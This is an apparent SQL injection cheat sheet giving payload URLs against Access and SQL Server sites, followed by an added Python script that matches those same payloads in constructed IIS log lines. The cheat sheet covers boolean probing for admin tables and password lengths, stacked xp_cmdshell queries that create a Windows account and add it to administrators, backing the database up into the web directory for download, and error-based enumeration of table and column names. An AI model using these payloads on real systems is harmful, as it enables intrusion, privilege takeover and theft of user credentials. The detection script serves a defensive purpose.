ACCESS
Query database type
/?sort_id=24 and exists (select * from sysobjects)
Query whether the table admin exists: the page displays normally if it does, and errors if it does not.
/?sort_id=24 and exists (select * from admin)
Query whether the column admin_name exists in the admin table
/?sort_id=24 and exists (select admin_name from admin)
Query the content length of the pwd column in the admin table (here, whether it is at most 7): the page errors when the comparison is false and returns normally when it is true.
/?sort_id=24 And (Select Top 1 len(cstr([pwd])) From (Select Top 1 * From [admin] Where 1=1 Order by [pwd]) T Order by [pwd] desc)<=7
Brute-force guessing the admin_name column in the admin table
SQL
①http://Site/?id=1;exec master..xp_cmdshell "net user name password /add"--
The semicolon: in SQL Server it separates two statements, and -- comments out everything that follows, so this request is split into two statements. The first selects the record with id=1; the second executes the stored procedure xp_cmdshell, which runs system commands, so the net command creates a new Windows account with the given user name and password. Then:
②http://Site/?id=1;exec master..xp_cmdshell "net localgroup administrators name /add"--
Add the newly created account to the administrators group. In under two minutes the highest system privileges have been obtained. Of course, this only works when the application connects to the database as sa; otherwise there is no permission to call xp_cmdshell.
③http://Site/?id=1 ;;and db_name()>0
This is similar to the earlier and user>0 example, which is used to get the connection user name. db_name() is another system variable; it returns the name of the connected database.
④http://Site/?id=1;backup database <database name> to disk='c:';--
This is a very ruthless move. Using the database name obtained in ③, plus the absolute path exposed by some IIS error messages, the database is backed up into the web directory and then downloaded in full over HTTP, so every administrator and user password is exposed. When the absolute path is unknown, the backup can also be directed to a network address (such as \202.), but the success rate is low.
⑤http://Site/?id=1 ;;and (Select Top 1 name from sysobjects where xtype='U' and status>0)>0
As mentioned earlier, sysobjects is a SQL Server system table that stores all objects: table names, views, constraints and so on. xtype='U' and status>0 selects the tables created by the user. The statement above takes the first table name and compares it with 0, so the resulting error message exposes the table name. How to get the second and third table names is left for the reader to work out.
⑥http://Site/?id=1 ;;and (Select Top 1 col_name(object_id('table name'),1) from sysobjects)>0
After obtaining a table name from ⑤, object_id('table name') returns the internal ID of that table, and col_name(table ID, 1) returns its first column name. Changing 1 to 2, 3, 4, ... yields the column names of the guessed table one by one.
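As an added example (not part of the original cheat sheet), the following Python script runs detection logic for the Access probes and the SQL Server payloads listed above over a few constructed IIS-style log lines; the W3C field order, the rule names and the sample requests are assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style lines (date time method uri-stem uri-query status);
# not real traffic. Queries carry the page's payloads as a client would encode them.
SAMPLE_LOG = """\
2024-01-01 10:00:01 GET /list.asp sort_id=24 200
2024-01-01 10:00:02 GET /search.asp q=cats+and+dogs 200
2024-01-01 10:00:03 GET /list.asp sort_id=24+and+exists+(select+*+from+sysobjects) 200
2024-01-01 10:00:04 GET /list.asp sort_id=24+and+exists+(select+admin_name+from+admin) 200
2024-01-01 10:00:05 GET /list.asp sort_id=24+And+(Select+Top+1+len(cstr([pwd]))+From+(Select+Top+1+*+From+[admin]+Where+1%3D1+Order+by+[pwd])+T+Order+by+[pwd]+desc)%3C%3D7 500
2024-01-01 10:00:06 GET /show.asp id=1%3Bexec+master..xp_cmdshell+%22net+user+name+password+/add%22-- 500
2024-01-01 10:00:07 GET /show.asp id=1+%3B%3Band+db_name()%3E0 500
2024-01-01 10:00:08 GET /show.asp id=1%3Bbackup+database+Database+to+disk%3D'c:'%3B-- 200
2024-01-01 10:00:09 GET /show.asp id=1+%3B%3Band+(Select+Top+1+name+from+sysobjects+where+xtype%3D'U'+and+status%3E0)%3E0 500
2024-01-01 10:00:10 GET /show.asp id=1+%3B%3Band+(Select+Top+1+col_name(object_id('admin'),1)+from+sysobjects)%3E0 500
"""

# Each rule (names are ours) covers one probing technique described on this page.
RULES = {
    "sysobjects_fingerprint": r"\bexists\s*\(\s*select\b[^)]*\bfrom\s+sysobjects\b",
    "exists_probe": r"\band\s+exists\s*\(\s*select\b",
    "length_inference": r"\bselect\s+top\s+1\s+len\s*\(",
    "stacked_xp_cmdshell": r";\s*exec\s+master\.\.xp_cmdshell\b",
    "db_fingerprint": r"\band\s+(?:db_name\s*\(\s*\)|user)\s*>\s*0",
    "backup_to_disk": r";\s*backup\s+database\b.*\bto\s+disk\b",
    "schema_enumeration": r"\bselect\s+top\s+1\s+(?:name|col_name\s*\(.*?\))\s+from\s+sysobjects\b",
}

def normalize_query(raw):
    """Decode twice (catches double-encoding), squeeze whitespace, lower-case."""
    decoded = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", decoded).strip().lower()

def classify(query):
    """Return the names of every rule the normalized query string matches."""
    norm = normalize_query(query)
    return [name for name, pat in RULES.items() if re.search(pat, norm)]

def scan_log(text):
    """Return (line number, status, matched rules) for every flagged request."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split(" ")
        if len(fields) != 6:          # skip header or malformed lines
            continue
        matched = classify(fields[4])
        if matched:
            hits.append((lineno, fields[5], matched))
    return hits
```

Pairing each hit with the response status (error versus normal page) is what turns a single flagged request into evidence of the boolean inference the Access section describes.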